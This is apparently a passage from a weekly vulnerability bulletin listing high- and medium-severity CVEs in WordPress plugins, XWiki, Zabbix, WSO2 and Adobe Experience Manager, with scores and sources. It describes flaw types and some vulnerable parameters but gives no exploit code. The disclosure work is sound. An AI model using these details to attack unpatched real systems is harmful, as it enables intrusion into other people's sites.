wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Hiroaki Miyashita Custom Post Type Page Template. This issue affects Custom Post Type Page Template: from n/a through 1.1.2023-12-188.8CVE-2023-50372
audit@patchstack.com
wordpress -- wordpressThe Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers to make logged in users perform unwanted actions leading to remote code execution.2023-12-188.8CVE-2023-5882
contact@wpscan.com
wordpress -- wordpressThe Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution.2023-12-188.8CVE-2023-5886
contact@wpscan.com
wordpress -- wordpressThe Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'ajaxUploadFonts' function in versions up to, and including, 4.3.5. This makes it possible for authenticated attackers with subscriber-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.2023-12-158.8CVE-2023-6827
security@wordfence.com
wordpress -- wordpressThe Backup Migration plugin for WordPress is vulnerable to Remote File Inclusion in versions 1.0.8 to 1.3.9 via the 'content-dir' HTTP header. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. NOTE: Successful exploitation of this vulnerability requires that the target server's php.ini is configured with 'allow_url_include' set to 'on'. This feature is deprecated as of PHP 7.4 and is disabled by default, but can still be explicitly enabled in later versions of PHP.2023-12-238.1CVE-2023-6971
security@wordfence.com
wordpress -- wordpressThe Widget Settings Importer/Exporter Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp_ajax_import_widget_dataparameter AJAX action in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with subscriber-level permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.2023-12-237.4CVE-2020-36769
security@wordfence.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in weDevs Dokan - Best WooCommerce Multivendor Marketplace Solution - Build Your Own Amazon, eBay, Etsy. This issue affects Dokan - Best WooCommerce Multivendor Marketplace Solution - Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.12.2023-12-207.1CVE-2023-26525
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Page Visit Counter Advanced Page Visit Counter - Most Wanted Analytics Plugin for WordPress. This issue affects Advanced Page Visit Counter - Most Wanted Analytics Plugin for WordPress: from n/a through 6.4.2.2023-12-207.1CVE-2023-28788
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BannerSky BSK Forms Blacklist. This issue affects BSK Forms Blacklist: from n/a through 3.6.2.2023-12-207.6CVE-2023-30872
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Adastra Crypto Cryptocurrency Payment & Donation Box - Accept Payments in any Cryptocurrency on your WP Site for Free. This issue affects Cryptocurrency Payment & Donation Box - Accept Payments in any Cryptocurrency on your WP Site for Free: from n/a through 2.2.7.2023-12-207.2CVE-2023-32128
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 5.7.1.2023-12-207.6CVE-2023-32743
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce Product Vendors allows SQL Injection. This issue affects Product Vendors: from n/a through 2.1.76.2023-12-187.2CVE-2023-33331
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WooCommerce Woo Subscriptions. This issue affects Woo Subscriptions: from n/a through 5.1.2.2023-12-207.5CVE-2023-35914
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Automattic WooPayments - Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments - Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0.2023-12-207.6CVE-2023-35915
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in Automattic WooPayments - Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments - Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0.2023-12-207.5CVE-2023-35916
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MainWP MainWP Dashboard - WordPress Manager for Multiple Websites Maintenance. This issue affects MainWP Dashboard - WordPress Manager for Multiple Websites Maintenance: from n/a through 4.4.3.3.2023-12-207.6CVE-2023-38519
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5.2023-12-207.4CVE-2023-46147
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in E2Pdf.Com E2Pdf - Export To Pdf Tool for WordPress. This issue affects E2Pdf - Export To Pdf Tool for WordPress: from n/a through 1.20.18.2023-12-197.2CVE-2023-46154
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Avirtum iPages Flipbook For WordPress. This issue affects iPages Flipbook For WordPress: from n/a through 1.4.8.2023-12-207.6CVE-2023-47236
audit@patchstack.com
wordpress -- wordpressThe Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not validate and sanitize the `wp_query` parameter, which allows an attacker to run arbitrary commands on the remote server.2023-12-187.2CVE-2023-4724
contact@wpscan.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPVibes Redirect 404 Error Page to Homepage or Custom Page with Logs allows SQL Injection. This issue affects Redirect 404 Error Page to Homepage or Custom Page with Logs: from n/a through 1.8.7.2023-12-187.2CVE-2023-47530
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Link Whisper Link Whisper Free. This issue affects Link Whisper Free: from n/a through 0.6.5.2023-12-207.2CVE-2023-47852
audit@patchstack.com
wordpress -- wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin - JobWP. This issue affects WordPress Job Board and Recruitment Plugin - JobWP: from n/a through 2.1.2023-12-217.5CVE-2023-48288
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WC Vendors WC Vendors - WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors. This issue affects WC Vendors - WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors: from n/a through 2.4.7.2023-12-197.6CVE-2023-48327
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in QuantumCloud AI ChatBot. This issue affects AI ChatBot: from n/a through 4.7.8.2023-12-197.2CVE-2023-48741
audit@patchstack.com
wordpress -- wordpressServer-Side Request Forgery (SSRF) vulnerability in Elegant Digital Solutions CommentLuv. This issue affects CommentLuv: from n/a through 3.0.4.2023-12-157.5CVE-2023-49159
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Younes JFR. Advanced Database Cleaner. This issue affects Advanced Database Cleaner: from n/a through 3.1.2.2023-12-197.2CVE-2023-49764
audit@patchstack.com
wordpress -- wordpressThe SmartCrawl WordPress plugin before 3.8.3 does not prevent unauthorized users from accessing password-protected posts' content.2023-12-187.5CVE-2023-5949
contact@wpscan.com
wordpress -- wordpressThe Events Calendar WordPress plugin before 6.2.8.1 discloses the content of password-protected posts to unauthenticated users via a crafted request.2023-12-187.5CVE-2023-6203
contact@wpscan.com
wordpress -- wordpressThe Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks.2023-12-187.2CVE-2023-6222
contact@wpscan.com
wordpress -- wordpressThe SiteOrigin Widgets Bundle WordPress plugin before 1.51.0 does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites.2023-12-187.2CVE-2023-6295
contact@wpscan.com
wordpress -- wordpressThe E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'import_action' function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site's server which may make remote code execution possible.2023-12-157.2CVE-2023-6826
security@wordfence.com
wordpress -- wordpressThe Backup Migration plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.9 via the 'content-backups' and 'content-name', 'content-manifest', or 'content-bmitmp' and 'content-identy' HTTP headers. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.2023-12-237.5CVE-2023-6972
security@wordfence.com
wordpress -- wordpressThe Backup Migration plugin for WordPress is vulnerable to OS Command Injection in all versions up to, and including, 1.3.9 via the 'url' parameter. This vulnerability allows authenticated attackers, with administrator-level permissions and above, to execute arbitrary commands on the host operating system.2023-12-237.2CVE-2023-7002
security@wordfence.com
wordpress -- wordpress
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.50.2023-12-208.5CVE-2023-33330
audit@patchstack.com
wordpress -- wordpress
Deserialization of Untrusted Data vulnerability in Rajnish Arora Recently Viewed Products. This issue affects Recently Viewed Products: from n/a through 1.0.0.2023-12-198.3CVE-2023-34027
audit@patchstack.com
wordpress -- wordpress
Unrestricted Upload of File with Dangerous Type vulnerability in ThemePunch OHG Slider Revolution. This issue affects Slider Revolution: from n/a through 6.6.15.2023-12-208.4CVE-2023-47784
audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PenciDesign Soledad - Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad - Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.2023-12-208.5CVE-2023-49825
audit@patchstack.com
wordpress -- wordpress
Deserialization of Untrusted Data vulnerability in PenciDesign Soledad - Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad - Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.2023-12-218.1CVE-2023-49826
audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in GuardGiant Brute Force Protection WordPress Brute Force Protection - Stop Brute Force Attacks. This issue affects WordPress Brute Force Protection - Stop Brute Force Attacks: from n/a through 2.2.5.2023-12-197.6CVE-2023-48764
audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Guelben Bravo Translate. This issue affects Bravo Translate: from n/a through 1.2.2023-12-207.6CVE-2023-49161
audit@patchstack.com
wordpress -- wordpress
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Magic Logix MSync. This issue affects MSync: from n/a through 1.0.0.2023-12-207.6CVE-2023-49166
audit@patchstack.com
wordpress -- wordpress
Deserialization of Untrusted Data vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc. This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.5.3.2023-12-197.5CVE-2023-49819
audit@patchstack.com
wso2 -- multiple_productsMultiple WSO2 products have been identified as vulnerable to user impersonation using JIT provisioning. For this vulnerability to have any impact on your deployment, the following conditions must be met: * An IDP configured for federated authentication, with JIT provisioning enabled with the "Prompt for username, password and consent" option. * A service provider that uses the above IDP for federated authentication and has the "Assert identity using mapped local subject identifier" flag enabled. The attacker must have: * A fresh valid user account in the federated IDP that has not been used earlier. * Knowledge of the username of a valid user in the local IDP. When all preconditions are met, a malicious actor could use the JIT provisioning flow to perform user impersonation.2023-12-158.5CVE-2023-6837
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 -- multiple_productsMultiple WSO2 products have been identified as vulnerable to an XML External Entity (XXE) attack, which abuses a widely available but rarely used feature of XML parsers to access sensitive information.2023-12-157.5CVE-2023-6836
ed10eef1-636d-4fbe-9993-6890dfa878f8
wuhan_deepin_technology_co.,_ltd. -- deepin-reader | Deepin Linux's default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via a crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue. | 2023-12-22 | 9.3 | CVE-2023-50254
security-advisories@github.com
xwiki -- xwiki | XWiki Platform is a generic wiki platform. Starting in 4.5-rc-1 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the search administration interface doesn't properly escape the id and label of search user interface extensions, allowing the injection of XWiki syntax containing script macros including Groovy macros that allow remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki instance. This attack can be executed by any user who can edit some wiki page like the user's profile (editable by default) as user interface extensions that will be displayed in the search administration can be added on any document by any user. The necessary escaping has been added in XWiki 14.10.15, 15.5.2 and 15.7RC1. As a workaround, the patch can be manually applied to the page `XWiki.SearchAdmin`. | 2023-12-15 | 8.8 | CVE-2023-50721
security-advisories@github.com
xwiki -- xwiki | XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, there is a reflected XSS or also direct remote code execution vulnerability in the code for displaying configurable admin sections. The code that can be passed through a URL parameter is only executed when the user who is visiting the crafted URL has edit right on at least one configuration section. While any user of the wiki could easily create such a section, this vulnerability doesn't require the attacker to have an account or any access on the wiki. It is sufficient to trick any admin user of the XWiki installation to visit the crafted URL. This vulnerability allows full remote code execution with programming rights and thus impacts the confidentiality, integrity and availability of the whole XWiki installation. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patch can be manually applied to the document `XWiki.ConfigurableClass`. | 2023-12-15 | 8.8 | CVE-2023-50722
security-advisories@github.com
xwiki -- xwiki | XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, anyone who can edit an arbitrary wiki page in an XWiki installation can gain programming right through several cases of missing escaping in the code for displaying sections in the administration interface. This impacts the confidentiality, integrity and availability of the whole XWiki installation. Normally, all users are allowed to edit their own user profile so this should be exploitable by all users of the XWiki instance. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patches can be manually applied to the `XWiki.ConfigurableClassMacros` and `XWiki.ConfigurableClass` pages. | 2023-12-15 | 8.8 | CVE-2023-50723
security-advisories@github.com
xwiki -- xwiki | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It's possible to execute a Velocity script without script right through the document tree. This has been patched in XWiki 14.10.7 and 15.2RC1. | 2023-12-21 | 8.3 | CVE-2023-50732
security-advisories@github.com
xwiki -- xwiki | XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability. | 2023-12-15 | 7.5 | CVE-2023-50719
security-advisories@github.com
zabbix -- zabbix-agent | The vulnerability is caused by an improper check of whether RDLENGTH overflows the buffer in a response from a DNS server. | 2023-12-18 | 8.1 | CVE-2023-32726
security@zabbix.com
zabbix -- zabbix-agent2 | The Zabbix Agent 2 item key smart.disk.get does not sanitize its parameters before passing them to a shell command, resulting in a possible remote code execution vulnerability. | 2023-12-18 | 9.8 | CVE-2023-32728
security@zabbix.com
zabbix -- zabbix_server | The website configured in the URL widget will receive a session cookie when testing or executing scheduled reports. The received session cookie can then be used to access the frontend as the particular user. | 2023-12-18 | 8.8 | CVE-2023-32725
security@zabbix.com
zabbix -- zabbix_server | An attacker who has the privilege to configure Zabbix items can use the function icmpping() with an additional malicious command inside it to execute arbitrary code on the current Zabbix server. | 2023-12-18 | 7.2 | CVE-2023-32727
security@zabbix.com


Medium Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-47064
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-47065
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48440
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Access Control vulnerability. An attacker could leverage this vulnerability to achieve a low-confidentiality impact within the application. Exploitation of this issue does not require user interaction. | 2023-12-15 | 5.3 | CVE-2023-48441
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48442
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48443
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48444
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48445
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48446
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48447
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48448
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48449
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48450
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48451
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48452
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48453
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48454
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48455
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48456
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48457
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48458
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48459
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48460
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48461
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48462
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48463
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48464
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48465
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48466
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48467
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48468
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48469
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48470
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48471
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48472
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48473
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48474
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48475
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48476
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48477
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48478
psirt@adobe.com
